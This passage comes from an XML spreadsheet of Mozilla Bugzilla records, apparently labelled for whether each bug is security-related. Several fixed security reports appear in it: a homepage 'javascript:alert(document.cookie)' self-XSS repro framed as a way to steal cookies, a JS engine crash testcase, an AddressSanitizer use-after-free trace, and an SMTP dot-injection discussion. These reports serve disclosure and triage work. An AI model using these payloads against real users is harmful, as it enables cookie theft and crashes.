          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5424" t="inlineStr">
        <is>
          <t>13 Branch</t>
        </is>
      </c>
      <c r="L5424" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5424" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5424" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5424" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5424" t="inlineStr">
        <is>
          <t>[adv-main22+]</t>
        </is>
      </c>
      <c r="Q5424" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5424" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5424" t="inlineStr">
        <is>
          <t>mozilla23</t>
        </is>
      </c>
      <c r="T5424" t="n">
        <v>1</v>
      </c>
      <c r="U5424" t="n">
        <v>0</v>
      </c>
      <c r="V5424" t="n">
        <v>25</v>
      </c>
      <c r="W5424" t="inlineStr">
        <is>
          <t>Bugzilla uses the "X-Frame-Options: SAMEORIGIN" header to prevent clickjacking, but for some reason, Firefox ignores this header for buglists. A testcase is attached to bug 761046. This seems related to the fact that buglists use the server push technology, see e.g. http://search.cpan.org/~markstos/CGI.pm-3.59/lib/CGI.pm#Server_Push. Opera, Chrome, Safari and IE8+ correctly prevent buglists from being loaded in frames, but Firefox doesn't.
Tested with Fx 13, and dveditz reproduced with a nightly build, from what he told me on IRC.</t>
        </is>
      </c>
      <c r="X5424" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5425">
      <c r="A5425" t="n">
        <v>1042684</v>
      </c>
      <c r="B5425" t="inlineStr">
        <is>
          <t>2014-07-23 07:06:50 -0700</t>
        </is>
      </c>
      <c r="C5425" t="inlineStr">
        <is>
          <t>Remove "schedule" &amp; "#developers" from repo info popup</t>
        </is>
      </c>
      <c r="D5425" t="inlineStr">
        <is>
          <t>2015-05-20 04:25:52 -0700</t>
        </is>
      </c>
      <c r="E5425" t="n">
        <v>1</v>
      </c>
      <c r="F5425" t="n">
        <v>1</v>
      </c>
      <c r="G5425" t="n">
        <v>7</v>
      </c>
      <c r="H5425" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5425" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5425" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5425" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5425" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5425" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5425" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5425" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5425" t="inlineStr"/>
      <c r="Q5425" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5425" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5425" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5425" t="n">
        <v>1</v>
      </c>
      <c r="U5425" t="n">
        <v>0</v>
      </c>
      <c r="V5425" t="n">
        <v>4</v>
      </c>
      <c r="W5425" t="inlineStr">
        <is>
          <t>The schedule hasn't been used for years (bug 822596) so we need to remove the links (on the repo info popup) to google calendar so as to avoid confusing people:
https://github.com/mozilla/treeherder-ui/blob/2d420b5e85390d7595cab27d3b25792c4c37b12b/webapp/app/partials/thRepoDropDown.html#L19</t>
        </is>
      </c>
      <c r="X5425" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5426">
      <c r="A5426" t="n">
        <v>717032</v>
      </c>
      <c r="B5426" t="inlineStr">
        <is>
          <t>2012-01-10 14:04:42 -0800</t>
        </is>
      </c>
      <c r="C5426" t="inlineStr">
        <is>
          <t>Update Config for Fx 10 WN Page--Removing Page from 10 Update Flow</t>
        </is>
      </c>
      <c r="D5426" t="inlineStr">
        <is>
          <t>2013-12-27 14:27:07 -0800</t>
        </is>
      </c>
      <c r="E5426" t="n">
        <v>1</v>
      </c>
      <c r="F5426" t="n">
        <v>1</v>
      </c>
      <c r="G5426" t="n">
        <v>5</v>
      </c>
      <c r="H5426" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5426" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5426" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5426" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5426" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5426" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5426" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5426" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5426" t="inlineStr"/>
      <c r="Q5426" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5426" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5426" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5426" t="n">
        <v>1</v>
      </c>
      <c r="U5426" t="n">
        <v>0</v>
      </c>
      <c r="V5426" t="n">
        <v>7</v>
      </c>
      <c r="W5426" t="inlineStr">
        <is>
          <t>We will not be showing a WN page for Firefox 10. 
Users updating from 3.6 to 10 however should see the http://www.mozilla.org/en-US/firefox/central/ page.</t>
        </is>
      </c>
      <c r="X5426" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5427">
      <c r="A5427" t="n">
        <v>485239</v>
      </c>
      <c r="B5427" t="inlineStr">
        <is>
          <t>2009-03-25 13:22:13 -0700</t>
        </is>
      </c>
      <c r="C5427" t="inlineStr">
        <is>
          <t>Website:Login state not preserved for users who navigate to gallery after logging in</t>
        </is>
      </c>
      <c r="D5427" t="inlineStr">
        <is>
          <t>2016-07-29 13:12:35 -0700</t>
        </is>
      </c>
      <c r="E5427" t="n">
        <v>1</v>
      </c>
      <c r="F5427" t="n">
        <v>1</v>
      </c>
      <c r="G5427" t="n">
        <v>6</v>
      </c>
      <c r="H5427" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5427" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J5427" t="inlineStr">
        <is>
          <t>Personas Plus</t>
        </is>
      </c>
      <c r="K5427" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5427" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5427" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5427" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5427" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5427" t="inlineStr"/>
      <c r="Q5427" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5427" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5427" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T5427" t="n">
        <v>1</v>
      </c>
      <c r="U5427" t="n">
        <v>0</v>
      </c>
      <c r="V5427" t="n">
        <v>8</v>
      </c>
      <c r="W5427" t="inlineStr">
        <is>
          <t>Steps to reproduce:
1.Login to your personas account.
2.From TOS page,click on "View Gallery"
3.From Gallery,click "Create your own" tab
expected result:
User navigates to TOS page
actual result:
user navigates to the login page.Login stats is not preserved.</t>
        </is>
      </c>
      <c r="X5427" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5428">
      <c r="A5428" t="n">
        <v>718203</v>
      </c>
      <c r="B5428" t="inlineStr">
        <is>
          <t>2012-01-14 09:53:09 -0800</t>
        </is>
      </c>
      <c r="C5428" t="inlineStr">
        <is>
          <t>prevent self-XSS in homepage icon (disallow javascript: drops)</t>
        </is>
      </c>
      <c r="D5428" t="inlineStr">
        <is>
          <t>2024-10-20 22:43:03 -0700</t>
        </is>
      </c>
      <c r="E5428" t="n">
        <v>1</v>
      </c>
      <c r="F5428" t="n">
        <v>1</v>
      </c>
      <c r="G5428" t="n">
        <v>2</v>
      </c>
      <c r="H5428" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5428" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5428" t="inlineStr">
        <is>
          <t>Tabbed Browser</t>
        </is>
      </c>
      <c r="K5428" t="inlineStr">
        <is>
          <t>9 Branch</t>
        </is>
      </c>
      <c r="L5428" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5428" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5428" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5428" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5428" t="inlineStr">
        <is>
          <t>[sg:low social engineering][qa!]</t>
        </is>
      </c>
      <c r="Q5428" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5428" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5428" t="inlineStr">
        <is>
          <t>Firefox 13</t>
        </is>
      </c>
      <c r="T5428" t="n">
        <v>1</v>
      </c>
      <c r="U5428" t="n">
        <v>0</v>
      </c>
      <c r="V5428" t="n">
        <v>34</v>
      </c>
      <c r="W5428" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Build ID: 20111220165912
Steps to reproduce:
Tested on Firefox 9.01
Windows 7 SP1
Reproduce:
1. Change you homepage to "javascript:alert(document.cookie)" or also you can be "javascript://www.google.com.br/?xss=%0aalert(1)".
2. Go to http://www.google.com.
3. Click in homepage icon.
4. See yours cookies of "http://www.google.com".
I think this can be exploited to steal cookies. Because extensions can change the homepage, and convence the victim to click in homepage.</t>
        </is>
      </c>
      <c r="X5428" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5429">
      <c r="A5429" t="n">
        <v>558531</v>
      </c>
      <c r="B5429" t="inlineStr">
        <is>
          <t>2010-04-10 00:40:08 -0700</t>
        </is>
      </c>
      <c r="C5429" t="inlineStr">
        <is>
          <t>Typo in JS_ResolveStandardClass causes built-in prototypes to be overwritten</t>
        </is>
      </c>
      <c r="D5429" t="inlineStr">
        <is>
          <t>2013-03-20 08:36:35 -0700</t>
        </is>
      </c>
      <c r="E5429" t="n">
        <v>1</v>
      </c>
      <c r="F5429" t="n">
        <v>1</v>
      </c>
      <c r="G5429" t="n">
        <v>3</v>
      </c>
      <c r="H5429" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5429" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5429" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5429" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5429" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5429" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5429" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5429" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5429" t="inlineStr">
        <is>
          <t>[sg:critical?]fixed-in-tracemonkey [qa-ntd-191] [qa-ntd-192]</t>
        </is>
      </c>
      <c r="Q5429" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5429" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5429" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5429" t="n">
        <v>1</v>
      </c>
      <c r="U5429" t="n">
        <v>0</v>
      </c>
      <c r="V5429" t="n">
        <v>14</v>
      </c>
      <c r="W5429" t="inlineStr">
        <is>
          <t>function f2(c) {
  return {
    g: c.match(/:/) &amp; c.match(/:/) &amp; c.match(/f/) &amp; c.m &amp; c.a &amp; c.match(/f/) &amp;
        c.match(/c/) &amp; c.match(/a/) &amp; (/s/) &amp; c.match(/e/) &amp; c.match(/s/) &amp;
        (c.match(/./) &amp; c.i) &amp; (c.match(/\*/)) &amp; (c.match(/n/)),
    y: c.a &amp; c.a &amp; c.match(/\)/) &amp; c.match(/\)/) &amp; c.match(/\)/)
        &amp; c.match(/\\/),
    c: c.match(/f/)
  }
}
function f1(c) {
  t = f2(c.replace(/s/))
  try {
    eval(c)
  } catch(e) {}
  f4();
  if (c.indexOf("&lt;") == -1 || c.indexOf())
  try {} catch(e) {}
  try {
    try {
      l
    } catch(e) {}
    if ("unwatch" in this) {}
    g
  } catch(e) {}
  try {} catch(p) {}
}
function f4() {
  try {} catch(e) {} {
    try {
      eval(s + "")
    } catch(e) {}
  }
} [{}]
s = [{},{}];
(function(){}())
s[{},{},{}] = [function(){}]
a = [{},{},{}].concat([{},{}]) 
f1("") 
f1("") 
f1("n") 
f1("") 
f1("(__proto__=null)") 
f1("for(var z=0;z&lt;1;z++){gc()(*::*)}") 
f1("gc()") 
f1("&lt;")
crashes js debug shell on JM changeset 0b7f385f3f59 with -m at 0xdadadade with js::methodjit::JaegerShot near the top of the stack. I tested this on 32-bit Mac debug build off changeset 0b7f385f3f59 because tip didn't compile for me. :(
(Not exactly the smallest) regression window:
http://hg.mozilla.org/users/danderson_mozilla.com/jaegermonkey/pushloghtml?fromchange=0075ab7ae8fe&amp;tochange=0b7f385f3f59
Stack:
Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x00000000dadadade
Crashed Thread:  0  Dispatch queue: com.apple.main-thread
Thread 0 Crashed:  Dispatch queue: com.apple.main-thread
0   ???                           	0x003ec4b9 0 + 4113593
1   js-dbg-32-jm-darwin           	0x001e2e82 js::methodjit::JaegerShot(JSContext*) + 408
2   js-dbg-32-jm-darwin           	0x000a0f04 js_RunScript + 158
3   js-dbg-32-jm-darwin           	0x000a1453 js_Execute + 1253
4   js-dbg-32-jm-darwin           	0x00012255 JS_ExecuteScript + 54
5   js-dbg-32-jm-darwin           	0x0000aaf5 Process(JSContext*, JSObject*, char*, int) + 458 (js.cpp:450)
6   js-dbg-32-jm-darwin           	0x0000b862 ProcessArgs(JSContext*, JSObject*, char**, int) + 2326 (js.cpp:870)
7   js-dbg-32-jm-darwin           	0x0000bc2f main + 953 (js.cpp:4975)
8   js-dbg-32-jm-darwin           	0x00002881 _start + 208
9   js-dbg-32-jm-darwin           	0x000027b0 start + 40</t>
        </is>
      </c>
      <c r="X5429" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5430">
      <c r="A5430" t="n">
        <v>319055</v>
      </c>
      <c r="B5430" t="inlineStr">
        <is>
          <t>2005-12-04 11:23:29 -0800</t>
        </is>
      </c>
      <c r="C5430" t="inlineStr">
        <is>
          <t>Mail::Mailer truncates messages at a line with a period when using sendmail</t>
        </is>
      </c>
      <c r="D5430" t="inlineStr">
        <is>
          <t>2007-02-13 18:32:40 -0800</t>
        </is>
      </c>
      <c r="E5430" t="n">
        <v>1</v>
      </c>
      <c r="F5430" t="n">
        <v>1</v>
      </c>
      <c r="G5430" t="n">
        <v>4</v>
      </c>
      <c r="H5430" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5430" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5430" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K5430" t="inlineStr">
        <is>
          <t>2.20</t>
        </is>
      </c>
      <c r="L5430" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5430" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5430" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5430" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5430" t="inlineStr"/>
      <c r="Q5430" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5430" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5430" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T5430" t="n">
        <v>1</v>
      </c>
      <c r="U5430" t="n">
        <v>0</v>
      </c>
      <c r="V5430" t="n">
        <v>13</v>
      </c>
      <c r="W5430" t="inlineStr">
        <is>
          <t>Lines containing a single dot "." are indicating the end of the message. The remaining part of the message could be arbitrarily executed by the SMTP server.
&lt;justdave&gt; I'd venture to call that a security bug
&lt;justdave&gt; because you can embed SMTP commands in an email and make it do weird things
&lt;LpSolit&gt; wicked, justdave: where is going the remaining part of the email?
&lt;wicked&gt; LpSolit: to the SMTP server for execution if justdave is right
&lt;justdave&gt; LpSolit: depends on the transport mechanism, which is controlled by Mail::Mailer (which is why it's Mail::Mailer's bug and not ours)
&lt;justdave&gt; if the transport is SMTP, it'd be going into the SMTP stream
&lt;justdave&gt; iow, interpreted as commands since the . terminates the DATA phase
&lt;LpSolit&gt; justdave: what nasty things could be done? something dangerous?
&lt;justdave&gt; send mail to arbitrary people and make it look like it came from Bugzilla's server
.
THIS PART OF THE COMMENT HAS NOT BEEN SENT!!!
(ARBITRARY CODE HERE)</t>
        </is>
      </c>
      <c r="X5430" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5431">
      <c r="A5431" t="n">
        <v>1566207</v>
      </c>
      <c r="B5431" t="inlineStr">
        <is>
          <t>2019-07-15 14:02:52 -0700</t>
        </is>
      </c>
      <c r="C5431" t="inlineStr">
        <is>
          <t>Enable Heroku Review Apps</t>
        </is>
      </c>
      <c r="D5431" t="inlineStr">
        <is>
          <t>2019-11-29 07:14:35 -0800</t>
        </is>
      </c>
      <c r="E5431" t="n">
        <v>1</v>
      </c>
      <c r="F5431" t="n">
        <v>1</v>
      </c>
      <c r="G5431" t="n">
        <v>7</v>
      </c>
      <c r="H5431" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5431" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5431" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K5431" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5431" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5431" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5431" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5431" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5431" t="inlineStr"/>
      <c r="Q5431" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5431" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5431" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5431" t="n">
        <v>1</v>
      </c>
      <c r="U5431" t="n">
        <v>0</v>
      </c>
      <c r="V5431" t="n">
        <v>3</v>
      </c>
      <c r="W5431" t="inlineStr">
        <is>
          <t>We can just enable the backend and frontend on a per PR basis so we can get it deployed.
For now, the backend can query the `treeherder-dev` database.</t>
        </is>
      </c>
      <c r="X5431" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5432">
      <c r="A5432" t="n">
        <v>137631</v>
      </c>
      <c r="B5432" t="inlineStr">
        <is>
          <t>2002-04-15 16:13:05 -0700</t>
        </is>
      </c>
      <c r="C5432" t="inlineStr">
        <is>
          <t>status workflow diagram</t>
        </is>
      </c>
      <c r="D5432" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:29 -0800</t>
        </is>
      </c>
      <c r="E5432" t="n">
        <v>1</v>
      </c>
      <c r="F5432" t="n">
        <v>1</v>
      </c>
      <c r="G5432" t="n">
        <v>4</v>
      </c>
      <c r="H5432" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5432" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5432" t="inlineStr">
        <is>
          <t>Documentation</t>
        </is>
      </c>
      <c r="K5432" t="inlineStr">
        <is>
          <t>2.10</t>
        </is>
      </c>
      <c r="L5432" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5432" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5432" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5432" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5432" t="inlineStr"/>
      <c r="Q5432" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5432" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5432" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5432" t="n">
        <v>1</v>
      </c>
      <c r="U5432" t="n">
        <v>0</v>
      </c>
      <c r="V5432" t="n">
        <v>40</v>
      </c>
      <c r="W5432" t="inlineStr">
        <is>
          <t>A bugzilla status/workflow diagram would be a useful addition to the Bugzilla
documentation.  As well as being a reference for existing Bugzilla users, it
would serve as a simple way of comparing Bugzilla to an existing bug tracking
system, as most proprietary/inhouse systems will have an equivalent diagram.</t>
        </is>
      </c>
      <c r="X5432" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5433">
      <c r="A5433" t="n">
        <v>788959</v>
      </c>
      <c r="B5433" t="inlineStr">
        <is>
          <t>2012-09-06 00:11:20 -0700</t>
        </is>
      </c>
      <c r="C5433" t="inlineStr">
        <is>
          <t>Heap-use-after-free in imgRequest::OnStopFrame</t>
        </is>
      </c>
      <c r="D5433" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:02 -0700</t>
        </is>
      </c>
      <c r="E5433" t="n">
        <v>1</v>
      </c>
      <c r="F5433" t="n">
        <v>1</v>
      </c>
      <c r="G5433" t="n">
        <v>3</v>
      </c>
      <c r="H5433" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5433" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5433" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K5433" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5433" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5433" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5433" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5433" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5433" t="inlineStr">
        <is>
          <t>[asan][adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q5433" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5433" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5433" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T5433" t="n">
        <v>1</v>
      </c>
      <c r="U5433" t="n">
        <v>0</v>
      </c>
      <c r="V5433" t="n">
        <v>22</v>
      </c>
      <c r="W5433" t="inlineStr">
        <is>
          <t>Reproduces on trunk. Testcase with better stack coming.
=================================================================
==6483== ERROR: AddressSanitizer heap-use-after-free on address 0x7f12bb7cef80 at pc 0x7f12ebf2a6ad bp 0x7fff1ecacb70 sp 0x7fff1ecacb68
READ of size 8 at 0x7f12bb7cef80 thread T0
    #0 0x7f12ebf2a6ac in nsQueryInterface::operator()(nsID const&amp;, void**) const objdir-ff-asan/xpcom/build/nsCOMPtr.cpp:14
    #1 0x7f12e91b069d in nsCOMPtr ../../dist/include/nsCOMPtr.h:554
    #2 0x7f12e919e955 in imgRequest::OnStopFrame(imgIRequest*, unsigned int) image/src/imgRequest.cpp:645
    #3 0x7f12e914d3cb in mozilla::image::Decoder::PostFrameStop() image/src/Decoder.cpp:246
0x7f12bb7cef80 is located 0 bytes inside of 24-byte region [0x7f12bb7cef80,0x7f12bb7cef98)
freed by thread T0 here:
    #0 0x42b630 in free 
    #1 0x7f12e948ca4d in nsBulletListener::Release() layout/generic/nsBulletFrame.cpp:1622
previously allocated by thread T0 here:
    #0 0x42b6f0 in __interceptor_malloc 
    #1 0x7f12ef58f3a8 in moz_xmalloc memory/mozalloc/mozalloc.cpp:57
    #2 0x7f12e94a86d4 in nsFrame::Init(nsIContent*, nsIFrame*, nsIFrame*) layout/generic/nsFrame.cpp:535
Shadow byte and word:
  0x1fe2576f9df0: fd
  0x1fe2576f9df0: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fe2576f9dd0: fd fd fd fd fd fd fd fd
  0x1fe2576f9dd8: fd fd fd fd fd fd fd fd
  0x1fe2576f9de0: fa fa fa fa fa fa fa fa
  0x1fe2576f9de8: fa fa fa fa fa fa fa fa
=&gt;0x1fe2576f9df0: fd fd fd fd fd fd fd fd
  0x1fe2576f9df8: fd fd fd fd fd fd fd fd
  0x1fe2576f9e00: fa fa fa fa fa fa fa fa
  0x1fe2576f9e08: fa fa fa fa fa fa fa fa
  0x1fe2576f9e10: 00 00 00 00 00 00 00 00
Stats: 352M malloced (405M for red zones) by 832581 calls
Stats: 60M realloced by 88678 calls
Stats: 304M freed by 665969 calls
Stats: 197M really freed by 173839 calls
Stats: 612M (156759 full pages) mmaped in 153 calls
  mmaps   by size class: 8:557022; 9:49146; 10:81900; 11:12282; 12:3072; 13:2048; 14:1280; 15:256; 16:448; 17:1280; 18:240; 19:40; 20:20; 21:2;
  mallocs by size class: 8:655210; 9:61844; 10:88875; 11:13927; 12:4293; 13:2966; 14:2222; 15:488; 16:815; 17:1614; 18:259; 19:47; 20:19; 21:2;
  frees   by size class: 8:513952; 9:46898; 10:84377; 11:10477; 12:3126; 13:2543; 14:1600; 15:435; 16:741; 17:1594; 18:165; 19:45; 20:16;
  rfrees  by size class: 8:114982; 9:29585; 10:13571; 11:8791; 12:1614; 13:1699; 14:1294; 15:249; 16:554; 17:1311; 18:137; 19:37; 20:15;
Stats: malloc large: 1941 small slow: 3643
==6483== ABORTING</t>
        </is>
      </c>
      <c r="X5433" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5434">
      <c r="A5434" t="n">
        <v>1242877</v>
      </c>
      <c r="B5434" t="inlineStr">
        <is>
          <t>2016-01-25 23:51:10 -0800</t>
        </is>
      </c>
      <c r="C5434" t="inlineStr">
        <is>
          <t>taskcluster-npm-cache supports using newer taskcluster-client for buildURL API</t>
        </is>
      </c>
      <c r="D5434" t="inlineStr">
        <is>
          <t>2019-02-08 13:19:49 -0800</t>
        </is>
      </c>
      <c r="E5434" t="n">
        <v>1</v>
      </c>
      <c r="F5434" t="n">
        <v>1</v>
      </c>
      <c r="G5434" t="n">
        <v>5</v>
      </c>
      <c r="H5434" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5434" t="inlineStr">
        <is>
          <t>Taskcluster</t>
        </is>
      </c>
      <c r="J5434" t="inlineStr">
        <is>
          <t>Services</t>
        </is>
      </c>
      <c r="K5434" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5434" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5434" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5434" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5434" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5434" t="inlineStr"/>
      <c r="Q5434" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5434" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5434" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T5434" t="n">
        <v>1</v>
      </c>
      <c r="U5434" t="n">
        <v>0</v>
      </c>
      <c r="V5434" t="n">
        <v>12</v>
      </c>
      <c r="W5434" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a follow-up of Bug #1238469 Comment #38 +++
In https://github.com/taskcluster/taskcluster-client/commit/b0f7e20fd34adc3d4b0cf596dd9531fbd2014815, taskcluster-client buildUrl API formalizes the parameter, so that 'public/node_modules.tar.gz'[1] is formalized to 'public%2Fnode_modules.tar.gz'. Look like we need to separated `public` and `node_modules.tar.gz` as two parameters in taskcluster-npm-cache-get.js
, e.g.
  let url = await queue.buildUrl(
    queue.getLatestArtifact,
    indexedTask.taskId,
    'public',
    'node_modules.tar.gz'
  );
[1] https://github.com/taskcluster/npm-cache/blob/52ecb6bbc44ebd6f16b69e97cb2c9476fd7f012d/src/bin/taskcluster-npm-cache-get.js#L90</t>
        </is>
      </c>
      <c r="X5434" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5435">
      <c r="A5435" t="n">
        <v>501900</v>
      </c>
